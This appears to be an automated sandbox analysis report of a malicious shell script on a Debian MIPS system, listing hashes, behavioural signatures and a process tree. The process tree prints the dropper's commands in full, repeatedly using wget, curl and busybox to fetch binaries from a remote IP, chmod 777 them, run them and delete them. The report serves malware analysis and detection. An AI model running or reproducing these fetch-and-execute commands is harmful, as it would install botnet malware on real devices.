Analysis
-
max time kernel
79s -
max time network
78s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
-
Size
10KB
-
MD5
bd36c3851a123cb041ac845fb2a97f33
-
SHA1
276091f6814de9b87d827fb423a0a158a37cd4a1
-
SHA256
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b
-
SHA512
ec36ea0baa72b2766fd4fdc90e029bb9421585299ce786b8d8d82f3ab5f0233385a8d06f9bfe0e65de636791cd75cd93617e8064c7343b4149e79aee2a1ed382
-
SSDEEP
192:Clp+dd0Rym0tDBRD+PDRJP1t6gFC2VymEDBRD+PDRJPG2a6Vlp+ddZ:U0lb+1tzF5sb+VaN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 770 chmod 962 chmod 998 chmod 839 chmod 902 chmod 908 chmod 776 chmod 796 chmod 820 chmod 875 chmod 890 chmod 992 chmod 1004 chmod 944 chmod 980 chmod 884 chmod 914 chmod 920 chmod 932 chmod 950 chmod 974 chmod 926 chmod 896 chmod 968 chmod 1010 chmod 938 chmod 956 chmod 986 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX 771 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu 797 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr 821 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ 840 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g 876 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv 885 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs 891 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW 897 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 903 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q 909 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC 915 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 921 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a 927 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr 933 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ 939 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g 945 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs 951 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW 957 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 963 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv 969 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC 975 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 981 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a 987 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q 993 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX 999 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr 1005 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu 1011 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g curl File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 curl File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a curl File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ curl File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC curl File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu curl File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu curl File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ curl File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW curl File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv curl File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr curl File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 curl File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW curl File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX curl File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs curl File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 curl File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr curl File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q curl File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs curl File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a curl File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q curl File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX curl File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv curl File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 curl File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g curl File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr curl File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr curl File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC curl
Processes
-
/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh1⤵PID:739
-
/bin/rm/bin/rm bins.sh2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:767
-
-
/bin/chmodchmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:775
-
-
/bin/chmodchmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:784
-
-
/bin/chmodchmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:815
-
-
/bin/chmodchmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:838
-
-
/bin/chmodchmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:852
-
-
/bin/chmodchmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:883
-
-
/bin/chmodchmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:889
-
-
/bin/chmodchmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:895
-
-
/bin/chmodchmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:901
-
-
/bin/chmodchmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:907
-
-
/bin/chmodchmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:913
-
-
/bin/chmodchmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:919
-
-
/bin/chmodchmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:925
-
-
/bin/chmodchmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:931
-
-
/bin/chmodchmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:937
-
-
/bin/chmodchmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:943
-
-
/bin/chmodchmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:949
-
-
/bin/chmodchmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:955
-
-
/bin/chmodchmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:961
-
-
/bin/chmodchmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:967
-
-
/bin/chmodchmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Executes dropped EXE
PID:969
-
-
